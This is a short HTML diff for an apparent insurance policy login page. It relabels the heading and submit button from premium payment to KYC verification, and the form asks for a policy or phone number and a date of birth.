--- a/index.html
+++ b/index.html
@@ -124,7 +124,7 @@ h1{font-size:24px;margin:2px 0 12px}
       <!-- <img src="logo.svg" alt="Brand small logo" class="logo-small"> -->
 
       <div class="card">
-        <h1>Pay premium</h1>
+        <h1>KYC Verification</h1>
         <p class="small" style="color:#556274;margin-top:-6px;margin-bottom:12px">
           Please login using your Policy number or Phone number
         </p>
@@ -137,7 +137,7 @@ h1{font-size:24px;margin:2px 0 12px}
             <label class="label" for="dob">Date of birth</label>
             <input id="dob" name="dob" class="input" type="date" required>
           </div>
-          <button class="primary" type="submit">Continue to payment</button>
+          <button class="primary" type="submit">Complete KYC</button>
         </form>
         <a href="#" id="toggleMode" class="altlink">Continue with your policy number</a>
       </div>
